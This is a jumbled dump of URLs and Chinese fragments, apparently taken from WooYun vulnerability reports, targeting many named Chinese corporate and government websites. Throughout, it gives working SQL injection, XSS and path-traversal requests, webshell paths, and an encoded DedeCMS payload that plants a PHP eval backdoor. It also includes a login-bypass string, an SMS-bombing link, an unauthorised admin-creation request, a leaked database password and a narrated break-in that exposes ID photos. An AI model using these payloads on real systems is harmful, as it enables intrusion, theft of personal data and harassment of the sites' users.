http://cam.inc.hc360.com/AccessRes/ResourceInput.aspx?checkCode=Hf8f61F77z5xkljOV1DtRpmv7RhSxKGLGi13bVFnL/tPzPWPAoYHoKHrQp4FSeaRtYPcXFx54Paf0E836gsiOB/N%2BWaIFDGuE5pZh%2BWN9%2Bvg3Gy4/4YKRhg7nQE2q2hxgnzTn9uNTfdGznAu2kmDhLnja2LfeXAm3E04N/QAFBc= http://cam.inc.hc360.com/AccessRes/ResourceInput.aspx?checkCode=Hf8f61F77z5EVQlfdni0gqTPbEQcZxle%2fj6HIf6pB7qKly%2f4%2bhG3vLXt9NFbh2U6w8TIKRPD8%2fIcNjjcyOWexIaLWEjU2JA9GAqxz%2b720TFbaEfruuMMeiUCy2PakZ17nc%2b%2bF16qvKdaZWU8yjoC37zd0CZh1lIgydY7RjHiudA%3d http://58.50.254.83:81/plus/mytag_js.php?aid=9090 http://www.chekucafe.com/content_cygs.php?NID=36 http://www.chekucafe.com/content_cyxm.php?NID=103 http://www.chekucafe.com/content_cyxm2.php?NID=125 http://www.chekucafe.com/content_mtbd.php?NID=-1 http://www.chekucafe.com/content_mtbd2.php?NID=-1 http://www.chekucafe.com/check.php data:pwd=1 http://www.fhredcross.org.cn/smsAdmin/index.aspx http://jipiao.suning.com/vgs-web/mobile/oct/modifyTraveller.htm http://jipiao.suning.com/vgs-web/mobile/oct/deleteTraveller.htm http://jipiao.suning.com/vgs-web/mobile/oct/viewTraveller.htm http://jipiao.suning.com/vgs-web/mobile/oct/orderList.htm http://jipiao.suning.com/vgs-web/mobile/oct/orderInfo.htm 
http://jipiao.suning.com/vgs-web/mobile/oct/cancelOrder.htm http://jiudian.suning.com/hotelpay-web/hotelTerminal/fnd/searchHotelOrders.htm http://www.furong.gov.cn:8000/spweb/serviceOnline/searchinfo.jsp?flownum=0110380000051307050027 http://law.inc.hc360.com/finance/detail.aspx?fund_code=20110408-008 http://m.lefeng.com/index.php/user/login http://www.youc.com/index.php?m=Game&a=server&game_id=22 http://www.youc.com/index.php?m=Game&a=search&nbr=&m=Game&a=search&nbr=88952634 http://map.soso.com/AppBox/print/?t=poi&c={"r":{"searchType":"defSearch","keyword http://baidu.com/ http://lexue.lenovo.com.cn/status http://202.110.193.80:8080/license!getExpireDateOfDays.action http://zone.wooyun.org/content/4912这种情况我们可以手动添加10086作为拦截目标,但是如果是用上千个网站上千个号码进行攻击呢?手动添加肯定是来不及的。更何况不断的短信弹窗占用极大系统资源,执行其他操作是很困难的。而关机或者飞行模式只能换取短暂的安宁,因为短信未能发送到手机会暂时停留,待手机能正常通信之后依旧发送到手机。而全部拦截的软件应该是没有,就算有也只有极个别应用商店才会有。 http://203.91.121.133/cacti/graph_view.php?action=tree&tree_id=6&leaf_id=79 http://www.mirapoint.com.cn/products/lanmu.php?id=14 http://g.youc.com/plus/mood_info.php?aid=12157 http://g.youc.com/plus/game/get_body.php?aid=12161 http://g.youc.com/plus/game/get_body.php?aid=12161 http://www.super8.com.cn/Mem/NewGuest.aspx?oid=30817 http://www.gzwst.gov.cn http://www.gzwst.gov.cn/SysHTML/ArticleHTML/12738_1.shtml http://web.sdpost.com.cn/bmfw8626/index.php http://webhelp.sdpost.com.cn/ http://webhelp.sdpost.com.cn/shop/html/?'155.html http://wap.hjsm.tom.com/phpinfo.php http://wap.hjsm.tom.com/js/fckeditor/editor/filemanager/connectors/test.html# site:jiayuan.com http://wapzj.189.cn/v5/getpwd.jsp http://www.jyhotels.com http://zone.wooyun.org/content/4226 http://old.jyinns.com/wyyp.asp?jid=1此处有注入 http://feedback.56.com/ http://www.jawsj.gov.cn/就能发现大量敏感目录和敏感文件,其中比较关键的是后台管理地址为http://www.jawsj.gov.cn/admin/admin_login.asp,以及CMS的数据库文件地址http://www.jawsj.gov.cn/database/SiteWeaver6.5.mdb,相信许多大侠手中的路径库都包含这两条路径。打开后台可以发现是动易的后台,同时从MDB的文件名也可看出是动易后台。 
http://www.jadj.com.cn/wh.asp。再比如吉安市永新县政府门户网站,使用了风讯5.0的cms做后台,该版本早已被爆存在SQL注入漏洞,在wooyun搜索也能找到这个漏洞的信息,笔者做过测试,确实能爆库。 http://www.chinadns.com/dns.sql http://www.chinadns.com/plus/download.php http://caipiao.58.com/news/ http://www.gansupost.com/ http://card.gansupost.com/Search.aspx?key=,看图 http://zy.gansupost.com/gszy/hyjj.asp?title=1 http://zy.gansupost.com/gszy/xhzf.asp https://pay.kongfz.com/中http://pay.kongfz.com/remit.do?act=toWriteRemitPage(须用户登录)‘资金管理’-‘填写汇款通知单’中的上传功能中,可以绕过JS过滤,直接上传webshell http://www.super8.com.cn/B090/SpecialZoneList.aspx?city=1011%27%20WAITFOR%20DELAY%20%270:0:1%27--&oid=471&sdate=2013-04-09 http://www.super8.com.cn/B090/SpecialZoneList.aspx?city=1011%27%20WAITFOR%20DELAY%20%270:0:10%27--&oid=471&sdate=2013-04-09 http://www.super8.com.cn/Hotel/HotelDetail.aspx?edate=2013-07-05&oid=557&sdate=2013-07-04&Tag=xxxs%22%3E%3Cimg/src=1%20onerror=alert%282%29%3E%3C http://zc.yundasys.com/ts/user/user_ts_detail.php?tsid=27263 http://fsz.xuyong.gov.cn/dede http://mis.998.com/ http://mis.998.com/Portal/Workflow/Reports/QingXiaoJia.aspx http://mis.998.com http://www.gzjls.net/showart.asp?id=1591 http://www.gzjls.net/downfile.asp?Filename=conn.asp http://www.gzjls.net/downfile.asp?Filename=index.asp www.gzjls.net/Database/24^&78$%$^@.asp http://www.gzjls.net/downfile.asp?Filename=database/database$#%#.asp www.519.com http://service.519.com/User_addresslist.aspx?action=loadmodifyaddress&callback=jsonp1373219130458&addressid=xxx http://service.519.com/User_addresslist.aspx?action=del&callback=jsonp1373220935815&id=xxx cn:8099 http://www.tohot.cn/rdwt/rdwtmain.php?txtid=10 URL:http://partner.etms.360buy.com/OrderDeliveryQuery/PS_QuanChengGenZong.aspx http://club.autohome.com.cn/bbs/thread-c-2123-23666325-1.html http://f.game.tom.com/wenba/my_answer.php?status=1 http://shop.sdcms.cn/user/message.asp http://shop.sdcms.cn/admin_seo/sd_order.asp http://180.153.21.161:49705/ http://180.153.21.162:49705/ http://180.153.21.163:49705/ http://180.153.21.164:49705/#/ 
http://www.0594hr.com/connect/API/comm/inc.php http://manager.51zhangdan.com:6969/statistics/comment.html http://visitor.lenovo.com.cn/yoga/zhtml4/blackdogllc/ http://61.iyiyun.com/Index/getmap/id/3 http://job.vanke.com/ http://job.vanke.com/xiao.asp http://www.ftchinese.com/ http://m.ftchinese.com/index.php/users/mobilelogin?gourl=%2Fstory%2F001051296 http://www.jjgk.sc.sgcc.com.cn:7777/stdpm/ http://atcy.anta.com/ http://atcy.anta.com/lan.aspx http://atcy.anta.com/nick.asp http://atcy.anta.com/anli/201112/lan.aspx http://atcy.anta.com/shell.asp http://atcy.anta.com/shell.asp;.jpg http://atcy.anta.com/shell.asp;1.jpg http://atcy.anta.com/install/default.aspx http://123.125.38.79:8080 http://123.125.38.79:8080/resin-doc/examples/security-basic/viewfile?file=WEB-INF/password.xml http://123.125.38.79:8080/resin-doc/examples/ioc-periodictask/viewfile?file=index.xtp http://123.125.38.79:8080/resin-doc/examples/ioc-periodictask/viewfile?file=WEB-INF/web.xml http://123.125.38.79:8080/resin-doc/examples/ioc-periodictask/viewfile http://www.hkguanhui.com/plus/mybak.php http://www.hkguanhui.com/plus/90sec.php http://zone.wooyun.org/content/4261 http://zone.wooyun.org/content/4226 http://114.247.129.12/ulp/ http://en.anta.com/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://en.anta.com/fckeditor/editor/filemanager/connectors/php/connector.php http://en.anta.com/file/image/fuce.php http://www.19lou.com/util/email/active/sendchange http://www.nicaimp.com/down/class/index.php?myord=cl http://music.weibo.com http://mail.ah.gov.cn/ http://0535.ctwap.cn/tyfy/uploadpic.jsp http://jifen.360.cn/lotteryrich.html http://www.tj.jcy.gov.cn/LoginManage.aspx http://webmail.dg.gov.cn/feedback/saveFeedback.do http://211.151.123.232/desktop/parse.action http://192.168.1.151:8080/ http://gboss.id5.cn/empQuery.do?operate=list,这里可以看到用户列表,查询用户这个有注入 
http://gboss.id5.cn/business/webBatchUpload.do?operate=download&type=1&thrId=120944358&callType=2&url=filepath,试下下载/etc/passwd,成功。扫描到它开放了7001端口,访问http://gboss.id5.cn:7001/console/,weblogic的后台,试了下默认密码,进不去,用之前的文件下载漏洞,下载到weblogic的配置文件,本地搭环境,把密码解密了出来,进weblogic后台,部署war,成功拿下shell。然后反编译网站的class,找到了接口的调用方法,和接口的授权文件。在网上找了个身份证号来测试,成功看到照片。照片用base64解码一下就行了 http://iyouxi.baidu.com/i/ajax_store.xhtml?c=pay&productId=253&productCategory=coin&buyCount=1 http://iyouxi.baidu.com/i/ajax_store.xhtml?c=pay&productId=99&productCategory=coin&buyCount=1 http://service.haier.net:8080/ http://www.eqsc.gov.cn/CCPT/ccpt/knowledge-hot!cptZHjianZaiSimpleSearch.action?inputboxzh=1 http://www.eqsc.gov.cn/CCPT/cc.jsp http://cho.zhaopin.com/pinglun.jsp?channelid=7 http://cho.zhaopin.com/zhuanlan.jsp?authorid=5&channelid=32 http://blog.ptjy.com/help.aspx直接登上去,发现存在脱裤脚本。 www.ptjy.com,端口一样,密码错误。 http://blog.ptjy.com的c段,发现存在一台服务器,目测也是教育局的。202.101.111.24,也是密码不同,纳闷了。 http://cdc.cma.gov.cn/gx/web/login.jsp http://www.alibaba.co.jp http://my.goodbaby.com/ucenter/avatar.php?size=small&gbuid=362429 http://my.goodbaby.com/ucenter/avatar.php?gbuid=1112949730 http://59.38.32.132/common/lin_tell.asp?ID=2 http://211.151.115.38/WEB-INF/web.xml http://211.151.115.39/WEB-INF/web.xml http://211.151.115.40/WEB-INF/web.xml http://211.151.115.41/WEB-INF/web.xml www.scpop.gov.cn http://www.wcfy.gov.cn/scjg/admin_login.asp http://www.dyxjyj.com/news.asp?DHID=192注入点 http://www.dyxjyj.com/zgadmin/login.asp后台 http://www.wcfy.gov.cn/x.asp http://www.wcfy.gov.cn/bys.asp http://211.151.249.134/BHDataCenter/login.action http://i.autohome.com.cn/ajax/relations/addfollower?fuid=8001685 http://i.autohome.com.cn/ajax/relations/addfollower?fuid=8001685&a=a.gif http://jxxt.sues.edu.cn/eams/login.action http://partner.etms.360buy.com/OrderOperationsBySite/PS_ZhanDianShouKuanPL.aspx http://bbs.mda139.com http://www.dns-edu.com/admin/member/index.asp可使用万能密码'or'='or'绕过,获得网站管理员权限,对主网站内容、会员私人信息、留学申请等进行管理 
http://deptweb.cqupt.edu.cn/xxzx/nav.php?id=179&level=2&cat_id=30 jdbc:sqlserver://172.16.3.190:1433;user=reader;password=bh123** http://sys.59.cn/System/ViewWork.asp?id=199472,将此id进行遍历可查询到其他用户提交的事务 http://training.htinns.com/download/ http://data.sports.sohu.com/golf/webroot/course_list.php?province=%E7%A6%8F%E5%BB%BA&hole_number=all&price=all&price_type=fee_n_visiter&course_name=&order_by=fee_n_visiter%20desc http://static.sse.com.cn这个域名来访问,而与服务器交互的动态脚本采用各业务系统的二级域,或主站的www.sse.com.cn来解析。 http://static.sse.com.cn/WEB-INF/web.xml www.sse.com.cn业务线的所有脚本文件源码。 http://biz.sse.com.cn/sseportal/cs/zhs/yzm/CreadGeneratedCode.jsp http://static.sse.com.cn/sseportal/cs/zhs/yzm/CreadGeneratedCode.jsp http://biz.sse.com.cn/sseportal/ps/zhs/ca/ca_intro.jsp http://static.sse.com.cn/sseportal/ps/zhs/ca/ca_intro.jsp http://ss.hnu.cn/mse/tutor.aspx?id=1%E2%80%98 http://www.dajie.com/corp/1036039/discuss/topic/177224/edit?recycle=false http://www.kuaikuai.cn/存在存储型跨站漏洞,在提问处的标题处存在跨站,可直接提问,插入恶意代码,窃取任意用户的cookie信息。通用的说 http://me.ztgame.com/account_manage/modiInfo.do www.amanktv.cn http://wanwan.sina.com.cn/third_party/sss.sina.com.cn/shop_gift_list.php?type_id=4&order=start_time%20desc http://www.66call.com/manage_66call/admin_newsManage.aspx# http://www.66call.com/newstype.aspx?type=-1+OR+17-7%3d10 http://www.66call.com/manage_66call/admin_newsManage.aspx# http://tg.union.tudou.com/mini/ http://chem.jlu.edu.cn/chemistry/depart.php?id=146&&cid=3&&deid=3 http://pk.tom.com/web/download_page.jsp?from=00403&q_id=99&mobile_game_id=609&class=and http://www.sgwsj.gov.cn/admin/upimg/ site:http://static.sse.com.cn/ filetype:jsp,可得到大量上海证券交易所的源码信息。 http://localhost/index.php?m=template&c=file&a=init&style=default&dir=announce&pc_hash=V2OA8M http://www.ndi.mil.cn/ http://www.htair.net/tools/dd.asp页面通过手机号查询订单号 http://www.htair.net/ticket/flights/order_viewedit.asp?order_id={0 http://www.htair.net/ticket/flights/order_viewedit.asp?order_id=20120724114110 
http://www.htair.net/ticket/flights/order_viewedit.asp?order_id=20120516233134 http://www.htair.net/ticket/flights/order_viewedit.asp?order_id=20120415210712 http://www.htair.net/ticket/flights/order_viewedit.asp?order_id=20120312170811 http://v.soufun.com/videomanage/video/VY.aspx?videoId=22007 http://v.soufun.com/videomanage/logon.aspx http://www.cemaia.org.cn/ http://ca.ufida.com.cn:8080/admin-enroll/console/ http://ca.ufida.com.cn:8080/admin-enroll/console/console.do http://www.yadeasv.com http://www.yadeasv.com/plus/ad_js.php?aid=9090 http://job.bjut.edu.cn/bjutCms/course/queryAllCourseInfo.action http://support-cn.samsung.com/StoreLocation/store/show/16752 http://61.129.103.71/ http://61.129.103.71/attachment/ http://61.129.103.71/manager/manager.xml http://61.129.103.71/manager/status.xsd http://3g.nw.sgcc.com.cn:8080/nwpr/index_indexAction.action http://www.cdgs.gov.cn/go/mhwz/sreach/sreach_list.go http://rstimes.com/admin/fckeditor/editor/fckeditor.html http://rstimes.com/upload/file/cmd.aspx http://60du.net/index.html http://help.sogou.com/hd/personfind/one.php?id=15604 http://www.ygshangjie.com/ 
http://xxx.com/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=116&arrs2[]=97&arrs2[]=103&arrs2[]=96&arrs2[]=32&arrs2[]=40&arrs2[]=97&arrs2[]=105&arrs2[]=100&arrs2[]=44&arrs2[]=101&arrs2[]=120&arrs2[]=112&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=44&arrs2[]=110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=41&arrs2[]=32&arrs2[]=86&arrs2[]=65&arrs2[]=76&arrs2[]=85&arrs2[]=69&arrs2[]=83&arrs2[]=40&arrs2[]=57&arrs2[]=48&arrs2[]=49&arrs2[]=51&arrs2[]=44&arrs2[]=64&arrs2[]=96&arrs2[]=92&arrs2[]=39&arrs2[]=96&arrs2[]=44&arrs2[]=39&arrs2[]=123&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=102&arrs2[]=105&arrs2[]=108&arrs2[]=101&arrs2[]=95&arrs2[]=112&arrs2[]=117&arrs2[]=116&arrs2[]=95&arrs2[]=99&arrs2[]=111&arrs2[]=110&arrs2[]=116&arrs2[]=101&arrs2[]=110&arrs2[]=116&arrs2[]=115&arrs2[]=40&arrs2[]=39&arrs2[]=39&arrs2[]=57&arrs2[]=48&arrs2[]=115&arrs2[]=101&arrs2[]=99&arrs2[]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=39&arrs2[]=39&arrs2[]=44&arrs2[]=39&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=101&arrs2[]=118&arrs2[]=97&arrs2[]=108&arrs2[]=40&arrs2[]=36&arrs2[]=95&arrs2[]=80&arrs2[]=79&arrs2[]=83&arrs2[]=84&arrs2[]=91&arrs2[]=103&arrs2[]=117&arrs2[]=105&arrs2[]=103&arrs2[]=101&arrs2[]=93&arrs2[]=41&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=123&arrs2[]=47&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=39&arrs2[]=41&arrs2[]=32&arrs2[]=35&arrs2[]=32&arrs2[]=64&arrs2[]=96&arrs2[]=92&arrs2[]=39&arrs2[]=96 http://xxx.com/plus/mytag_js.php?aid=9013 http://xxx.com/plus/90sec.php http://admin.super8.com.cn中的fckeditor 
http://admin.super8.com.cn/fckeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=http://admin.super8.com.cn/fckeditor/editor/filemanager/connectors/asp/connector.asp http://www.xjbtjshbj.gov.cn/data/dig.php http://www.xjbtjshbj.gov.cn/data/api.inc.php http://www.xjbtjshbj.gov.cn/data/cache/pker.php http://www.ccard.net.cn/ccard/sortproduct/sortCard!soryCategory.action http://bj.bbs.house.sina.com.cn/bbs/post/show/?pid=5760565591639346474 http://bbs.51zhangdan.com/ http://bbs.51zhangdan.com/robots.txt/1.php http://job.super8.com.cn/backend.php/interface/getdoc/?path=/../../../../etc/passwd http://capital.datanggroup.cn/index.php?action=getmsg&newsid=682 http://180.169.5.42/ http://180.169.5.42/ftb.imagegallery.aspx http://180.169.5.42/ftb.imagegallery.aspx?frame=1&rif=images&cif=..\..\..这里可以列目录 http://jlxxxt.sgcc.com.cn:8900/acgpm/project/login/login.action http://images.wandafilm.com/ http://www.leiphone.com/wp-includes/pomo/mo.php weiqi.sports.sohu.com/qipu/qipumain.asp?Do=Search&P1=1 weiqi.sports.sohu.com/qipu/Login.asp site:a.dodonew.com http://a.dodonew.com:8080/dodonew/front/userCenter/index.jsp?dodoId=12121232 http://a.dodonew.com:8080/dodonew/back/exchange.Commodity.page http://api.market.bitauto.com/admin/ http://api.market.bitauto.com/webadmin/UploadDB2012/ http://lvr.land.moi.gov.tw/N11/homePage.action url:http://b2c.366ec.com/admin/controls/PermissionHandler.ashx referer:http://b2c.366ec.com/admin/Permission/RolePermissionManage.aspx?RoleId=1 
post:type=save_rolepermission&RoleID=1&Ids=19%3A3298536980849%7C20%3A17%7C66%3A17%7C144%3A21%7C21%3A17%7C22%3A15%7C23%3A393231%7C24%3A15%7C25%3A31%7C26%3A271%7C27%3A6291471%7C33%3A17%7C34%3A1%7C35%3A17%7C145%3A17%7C188%3A17182001615%7C41%3A1638913%7C42%3A5%7C45%3A2162719%7C46%3A65567%7C47%3A2162703%7C153%3A15%7C48%3A31%7C57%3A15%7C58%3A143%7C59%3A15%7C60%3A2079%7C61%3A2063%7C62%3A180388609754757%7C63%3A140737490452497%7C64%3A8392713%7C161%3A39651121399429%7C162%3A35253074888325%7C163%3A68702799493%7C164%3A35184373137609%7C65%3A70368746668175%7C152%3A145%7C67%3A31%7C69%3A395279%7C146%3A17%7C70%3A395273%7C147%3A17%7C80%3A15%7C81%3A65551%7C82%3A65551%7C83%3A1%7C84%3A2053%7C85%3A17%7C86%3A426005%7C91%3A412316880005%7C92%3A19073%7C165%3A1855425891461%7C166%3A206158449793%7C167%3A2336462228625%7C168%3A137438973065%7C169%3A137438973065%7C170%3A137438973065%7C171%3A137438973065%7C173%3A18561%7C174%3A18561%7C175%3A18561%7C176%3A18569%7C177%3A18569%7C94%3A137438955673%7C95%3A137438955673%7C96%3A137438955673%7C97%3A18569%7C98%3A18569%7C99%3A18569%7C100%3A18569%7C101%3A137%7C107%3A2109327%7C108%3A2097167%7C149%3A17%7C110%3A4111%7C111%3A17%7C112%3A8388623%7C113%3A8388623%7C114%3A8388617%7C115%3A8521749%7C116%3A2057%7C191%3A2109327%7C192%3A2097167%7C195%3A2109327%7C196%3A2097167%7C109%3A17%7C156%3A17%7C122%3A2065%7C123%3A17592186044417%7C124%3A17592186044417%7C125%3A129%7C126%3A17592186044545%7C127%3A17592186044545%7C128%3A17592186044545%7C129%3A129%7C130%3A17592186044545%7C131%3A2177%7C547%3A17592186044545%7C28%3A1%7C180%3A68702799495%7C181%3A2490511%7C182%3A145%7C185%3A2177%7C186%3A2177%7C187%3A129%7C29%3A17%7C30%3A4194305%7C31%3A2097153%7C32%3A17%7C136%3A2490383%7C137%3A15%7C138%3A2097167%7C139%3A9%7C140%3A105%7C141%3A9%7C142%3A5%7C url:http://b2c.366ec.com/admin/controls/operdo.ashx referer:http://b2c.366ec.com/admin/config/addoper.aspx?width=720&height=400&_=1373093738559 post:type=save_oper&username=test&role=1&status=1&realname=test&pwd=123456&usercode=1111 
http://test.union.tudou.com/test/ http://test.union.tudou.com/test/break/up/forup2.rar http://test.union.tudou.com/test/lechen/tool/phpMyAdmin/ http://12580wap.10086.cn/life/wap2/activity_intro.php?activity_id=35 http://12580wap.10086.cn/daohang/index.php?fid=0002&v=2&pid=u01'&m=1365102621000_302&vd=&md=&ci=10000000&rtm=1365102621982&lsh=60nmru6kmr7&&getu=1&m=&vendor=&model=&vd=&md=&mCnt=2 http://dota2db.games.sina.com.cn/?a=hero_info&id=10487 http://www.cdt-yn.com/dtynwebsec/listshowinfotest.jsp?id=122&cid=114 http://big5.xinhuanet.com/gate/big5/big5.home.news.cn/gate/big5/book1.news.cn/admin/login.jsp http://res.ikanshu.cn/imgs/da.jsp;.jpg(存放图片服务站点) http://www.cdt-sx.com/front/mainAction.action http://koodemontest22.koofang.com:8022/admin/AdminLoginForm.aspx?url=main.aspx http://www.cdt-gz.com//accessoriesAction.ndo?action=download&itemId=594B890B-8C27-C0C2-9397-3666DC541BD0&filePath=/upload/594B890B-8C27-C0C2-9397-3666DC541BD01346922637747.pdf&fileName=%BC%AF%CD%C5%B9%AB%CB%BE%C6%F3%D2%B5%CE%C4%BB%AF%CA%D3%C6%B5%BD%B2%D7%F9%BF%CE%BC%FE.pdf http://www.cdt-gz.com//accessoriesAction.ndo?action=download&itemId=594B890B-8C27-C0C2-9397-3666DC541BD0&filePath=/index.jsp&fileName=index.jsp http://www.renrencard.com/sql/ http://www.surfingjs.com/index.php时无意间发现了一个oa平台: http://202.102.41.62/hsoa/index.htm http://m.super8.com.cn/Ajax/GetHotelData.ashx?action=GetRmTypeName&t=SK&oid=148 http://m.super8.com.cn/Ajax/GetHotelData.ashx?action=GetImg&hotelid=148 http://m.super8.com.cn/Ajax/GetHotelData.ashx?action=GetPriceDes&s=2013-07-18&e=2013-07-19&t=SK&h=148 http://m.super8.com.cn/Ajax/GetHotelData.ashx?action=GetHotelPage&code=1003&sdate=2013-07-18&edate=2013-07-19&shotelkey=1&page=0 http://pan.baidu.com/share/link?shareid=228348&uk=2318699196 http://www.china-cdto.com/hwtzweb//accessoriesAction.ndo?action=download&itemId=3948D7CD-7908-DEE4-9325-79A6F3A9C744&filePath=/index.jsp&fileName=index.jsp http://wp.msn.com.cn/app/619eeab3-e459-440c-a924-2a7aa4236c0d.shtml 
http://iqiyi.com/server-status http://www.yundaex.com/area.php?m=get_post_code&id=1 http://comment.cnr.cn/cnrmsg/admin/index.php?do=login http://112.90.56.99/index.php/admin/login?error=error%20password%20or%20username http://system.greentree.com.cn:8070/ http://eagle.gfan.com/projecteagle.aspx cn:8080 http://192.168.1.1/cgi-bin/upload.php?name=2013-07-11-001700.bak http://pic.gmw.cn/admin/ http://mhi.gdsafety.gov.cn/ http://sse.eln.com.cn/eln/reg.php?gsid=1925 http://122.11.45.188/solr/#/ http://product.it.sohu.com/core/admin/ http://mts.zte.com.cn/Mtsmap/CustomerLogin.aspx http://mts.zte.com.cn/Mtsmap/就会出现目录遍历,并且有许多rar压缩文件可供下载,许多涉及一些手机项目的参数以及许多手机及手机相关的图纸信息,等于是不需要任何权限下载这个供应商图纸管理系统里的所有文件图纸,访问授权形同虚设! https://tgonline.moe.gov.sg/tgis/secure/loginStudent.action inurl:zone.pptv.com找到了几个活动的后台,其中个人信息挺多的...算信息泄露了吧, http://zone.pptv.com/durex/admin/index http://www2.chekucafe.com/login.php http://www.cdcgs.cn/Message/Complain.aspx http://www.cdcgs.cn/webconsole/Login.aspx cookie:admin=62 http://www.cdcgs.cn/static/BIN/130711/123414742.aspx www.leiphone.com/v.php?a=1&pt=author&r=http://www.leiphone.com/&t=web http://kuainv.pptv.com/event/list?t=ing&sort=join_cnt data:text/html;base64,PGlmcmFtZSBzcmM9aHR0cDovL3d3dy53b295dW4ub3JnPg== http://bu.uc.cn/logs/ http://bu.uc.cn/public/ http://www.imeach.com/giftList.php?catid=18&only=&order=&score=&sort= http://dlxtag.lenovo.com/BSF/ http://888.qq.com/m.html http://shouji.kuwo.cn/ http://huifu.qq.com/recovery/index.html?frag=1 http://account.iicall.com/qwerasdfa2134sdfx/addclass.asp http://account.iicall.com/qwerasdfa2134sdfx/addadmin.asp http://account.iicall.com/qwerasdfa2134sdfx/addnews.asp http://account.iicall.com/qwerasdfa2134sdfx/admin.asp http://account.iicall.com/qwerasdfa2134sdfx/bbs1.asp http://account.iicall.com/qwerasdfa2134sdfx/black.asp http://account.iicall.com/qwerasdfa2134sdfx/call.asp http://account.iicall.com/qwerasdfa2134sdfx/delnews.asp http://account.iicall.com/qwerasdfa2134sdfx/editnews.asp 
http://account.iicall.com/qwerasdfa2134sdfx/freeze.asp http://account.iicall.com/qwerasdfa2134sdfx/friend.asp http://account.iicall.com/qwerasdfa2134sdfx/function.asp http://account.iicall.com/qwerasdfa2134sdfx/login.asp http://account.iicall.com/qwerasdfa2134sdfx/logout.asp http://account.iicall.com/qwerasdfa2134sdfx/news.asp http://account.iicall.com/qwerasdfa2134sdfx/savenews.asp http://account.iicall.com/qwerasdfa2134sdfx/ub.asp http://account.iicall.com/qwerasdfa2134sdfx/updateuser.asp http://www.adiconhealth.com/NewSearch/FinaRepoit.aspx?PatientCode=XXXXXXXXXXXX http://k.pcauto.com.cn/admin/auth-client/sel-user.jsp http://huodong.womai.com/bailing-gz/api/getInfoByUid.php?&web=bj&name=1%27 http://dragonpass.com.cn/f-news-show?news.id=47959这种地址大致猜想news.id对应后台的对象与属性,猜测应该是用了struts框架,就试了下是否存在命令执行的问题,果然还是存在的。 http://finance.cmpp.ifeng.com/Cmpp/index.jhtml http://g.cmpp.ifeng.com/Cmpp/index.jhtml http://211.156.193.141/showGG.jsp?ggid=1 http://card.chinapost.com.cn/ http://yy.hn165.com/ http://yy.hn165.com/data.rar http://yy.hn165.com/123.rar http://www.renren.com/123456789/profile,记录123456789,这是目标的 http://photo.renren.com/photo/123456789/album-profile http://photo.renren.com/photo/123456789/latest/photo-987654321 http://lvyou.baidu.com http://status.renren.com/status/123456789 http://share.renren.com/share/123456789 http://www.xwjj.com/announce/show.php?an_id=9 http://www.xwjj.com/test.php http://www.xwjj.com/info.php http://svn.go.sohu.com/2012/china4abm/index.php http://svn.go.sohu.com/2012/china4abm/index.php?r=post/view&id=1303 http://svn.go.sohu.com/2012/china4abm/index.php?r=post/update&id=1303 http://shai.goodbaby.com/_api/api.php?schema=get_share_like_count&cids=2 http://hb.189.cn/ http://opinion.chinabyte.com/reader/reader.jhtml?sitemapId=1&url=http://www.chinabyte.com&title=%B1%C8%CC%D8%CD%F8 http://cms.chinabyte.com/welcome/init.jhtml http://cms.chinabyte.com/welcome/init.jhtml 
http://cif.mofcom.gov.cn/site/FCKeditor/editor/filemanager/browser/default/browser.html.bak?Type=../&Connector=connectors/jsp/connector http://www.998.com/Active/Promotions.aspx?Tab=-1&PageIndex=0&Keyword=a url:http://lefen.lenovo.com/index.php/kebi/ http://hi.alipay.com/query/gift_detail.htm?prizeSendId=184809793&_xbox=true http://fm-ask.kunlun.com http://go.sohu.com/2013/yangtianM490s/work.php?workid=8076 http://admin.focus.cn/ www.fumu.com http://drops.wooyun.org/tips/125思路。 http://feedback.vrs.sohu.com/feedback/info.jsp?id=380056 http://feedback.vrs.sohu.com/feedback/info.jsp?id=380052 http://www.e-trans.com.cn:8050/schoolbus/login.action http://www.e-trans.com.cn/loginfour.html http://www.e-trans.com.cn:8090/etrans4002/ http://www.it168.com/remen/dianping/ http://www.sjzbus.com.cn/upload/ http://bbs.39.net/by/forum/457-1-1.html http://bbs.39.net/user/1965735.html http://my.39.net/passport/findPwd.aspx http://219.141.187.20/display.aspx?ID=10&Type=statute http://sc.m.sohu.com http://sc.m.sohu.com/uc/v2/profile/modifyUserAddress http://sc.m.sohu.com/uc/v2/product/list http://sc.m.sohu.com/uc/v2/user/otherByUid?uid=fb3edcfcc1c446as(这里的链接可以知道别人的UID。如果看到他兑换了不错的东西 http://sc.m.sohu.com/uc/v2/message/friendDialog?otherUid=fb3edcfcc1c446as http://m.10086.cn/wireless/n-migu/regbox.htm?q=这里填写要轰炸的手机号码&id=3772&k=002000a http://product.news.sohu.com/news/60year/add.php http://product.news.sohu.com/news/60year/infog.php?id=109 http://vip.club.sohu.com/zhumengtianshi/list.php?type=new&page=15 http://www.meile.com/text/create http://***.com/test.html https://210.74.41.142/manager/html/ http://dkp.yunquezhai.com/gonggao.php?type=wz&id=172%20and%201=1 http://dkp.yunquezhai.com/gonggao.php?type=wz&id=172%20and%201=2 http://dkp.yunquezhai.com/gonggao.php?type=wz&id=178 http://www.leiphone.com/live/index.php?id=1 http://tech.sanygroup.com/FCKeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=GetFoldersAndFiles&Type=&CurrentFolder=/../ 
